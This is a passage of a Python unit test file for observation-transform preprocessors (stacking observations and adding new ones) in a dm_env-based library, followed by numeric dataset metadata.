output_pos = output_timestep.observation['pos']
np.testing.assert_array_almost_equal(output_pos, pos_offset)
output_euler = tr.quat_to_euler(output_timestep.observation['quat'])
np.testing.assert_array_almost_equal(output_euler, [0.2, 0., 0.])
class StackObservationsTest(parameterized.TestCase):
@parameterized.parameters(
(False, (4,), (12,)),
(True, (4,), (3, 4)),
(False, (1,), (3,)),
(True, (1,), (3, 1)),
(False, (4, 4), (12, 4)),
(True, (4, 4), (3, 4, 4)),
)
def test_stack_observations_spec(
self, add_leading_dim, input_shape, output_shape):
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=input_shape, dtype=np.float32, name='pos'),
}
input_spec = _build_unit_timestep_spec(
observation_spec=input_obs_spec)
# Generate the expected stacked output spec.
expected_output_obs_spec = {
'pos': specs.Array(shape=output_shape, dtype=np.float32, name='pos'),
}
expected_output_spec = _build_unit_timestep_spec(
observation_spec=expected_output_obs_spec)
preprocessor = observation_transforms.StackObservations(
obs_to_stack=['pos'],
stack_depth=3,
add_leading_dim=add_leading_dim)
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(expected_output_spec, output_spec)
@parameterized.parameters(
(False, (4,), (12,)),
(True, (4,), (3, 4)),
(False, (1,), (3,)),
(True, (1,), (3, 1)),
(False, (4, 4), (12, 4)),
(True, (4, 4), (3, 4, 4)),
)
def test_stack_observations(self, add_leading_dim, input_shape, output_shape):
# Generate the input spec.
input_obs_spec = {
'pos': specs.Array(shape=input_shape, dtype=np.float32, name='pos'),
}
input_spec = _build_unit_timestep_spec(
observation_spec=input_obs_spec)
preprocessor = observation_transforms.StackObservations(
obs_to_stack=['pos'],
stack_depth=3,
add_leading_dim=add_leading_dim)
preprocessor.setup_io_spec(input_spec)
input_pos = np.random.random(input_shape).astype(np.float32)
if add_leading_dim:
expected_output_pos = np.stack([input_pos for _ in range(3)], axis=0)
else:
expected_output_pos = np.concatenate(
[input_pos for _ in range(3)], axis=0)
input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.FIRST,
observation={'pos': input_pos,})
output_timestep = preprocessor.process(input_timestep)
output_pos = output_timestep.observation['pos']
np.testing.assert_allclose(expected_output_pos, output_pos)
np.testing.assert_allclose(expected_output_pos.shape, output_shape)
class AddObservationTest(absltest.TestCase):
def test_no_overwriting(self):
preprocessor = observation_transforms.AddObservation(
obs_name='pos',
obs_callable=lambda _: [1., 1., 1.])
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
error_msg = 'Observation pos already exists.'
with self.assertRaisesWithLiteralMatch(ValueError, error_msg):
preprocessor.setup_io_spec(input_spec)
def test_fail_to_run_obs_callable(self):
preprocessor = observation_transforms.AddObservation(
obs_name='new_obs',
obs_callable=lambda timestep: timestep.observation['not_exist'])
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
# The obs_callable is trying to use an observation named `not_exist` not
# present.
with self.assertRaisesRegex(KeyError, 'not_exist'):
preprocessor.setup_io_spec(input_spec)
def test_add_obs_correctly(self):
preprocessor = observation_transforms.AddObservation(
obs_name='new_obs',
obs_callable=lambda _: np.asarray([1., 1., 1.], dtype=np.float32))
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': np.array([1.0, -1.5, 3.2], dtype=np.float32),
'quat': np.asarray(tr.euler_to_quat([0.1, 0.2, 0.3]), dtype=np.float32)
}
input_timestep = testing_functions.random_timestep(
spec=input_spec, step_type=dm_env.StepType.MID, observation=input_obs)
# Setup the expected output specs.
expected_observation_spec = input_obs_spec.copy()
expected_observation_spec['new_obs'] = (
specs.Array(shape=[3,], dtype=np.float32, name='new_obs'))
expected_output_spec = copy.deepcopy(input_spec)
# Check the specs.
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_spec.reward_spec,
expected_output_spec.reward_spec)
self.assertEqual(output_spec.discount_spec,
expected_output_spec.discount_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
output_new_obs = output_timestep.observation['new_obs']
np.testing.assert_array_almost_equal(output_new_obs, [1., 1., 1.])
def test_add_obs_correctly_with_provided_specs(self):
new_obs_spec = specs.BoundedArray(
shape=(3,), dtype=np.int32, minimum=-1, maximum=3, name='new_obs')
preprocessor = observation_transforms.AddObservation(
obs_name='new_obs',
obs_callable=lambda _: np.array([1, 1, 1], dtype=np.int32),
obs_spec=new_obs_spec)
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': np.array([1.0, -1.5, 3.2], dtype=np.float32),
'quat': np.asarray(tr.euler_to_quat([0.1, 0.2, 0.3]), dtype=np.float32)
}
input_timestep = testing_functions.random_timestep(
spec=input_spec, step_type=dm_env.StepType.MID, observation=input_obs)
# Setup the expected specs.
expected_observation_spec = dict(input_obs_spec)
expected_observation_spec['new_obs'] = new_obs_spec
expected_output_spec = copy.deepcopy(input_spec)
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_spec.reward_spec,
expected_output_spec.reward_spec)
self.assertEqual(output_spec.discount_spec,
expected_output_spec.discount_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
output_new_obs = output_timestep.observation['new_obs']
np.testing.assert_array_almost_equal(output_new_obs, [1., 1., 1.])
def _build_unit_timestep_spec(
observation_spec: Optional[Mapping[str, specs.Array]] = None,
reward_spec: Optional[specs.Array] = None,
discount_spec: Optional[specs.BoundedArray] = None):
if observation_spec is None:
name = 'foo'
observation_spec = {
name: specs.Array(shape=(2,), dtype=_DEFAULT_TYPE, name=name),
}
if reward_spec is None:
reward_spec = scalar_array_spec(name='reward')
if discount_spec is None:
discount_spec = scalar_array_spec(name='discount')
return spec_utils.TimeStepSpec(
observation_spec=observation_spec,
reward_spec=reward_spec,
discount_spec=discount_spec)
if __name__ == '__main__':
absltest.main()
| 39.358037
| 80
| 0.706747
| 5,065
| 40,893
| 5.367226
| 0.065745
| 0.045908
| 0.03215
| 0.034762
| 0.853596
| 0.821115
| 0.795292
| 0.780246
| 0.716572
| 0.70252
| 0
| 0.017269
| 0.191426
| 40,893
| 1,038
| 81
| 39.395954
| 0.804899
| 0.06852
| 0
| 0.658854
| 0
| 0
| 0.020809
| 0
| 0
| 0
| 0
| 0
| 0.080729
| 1
| 0.044271
| false
| 0
| 0.016927
| 0.003906
| 0.076823
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.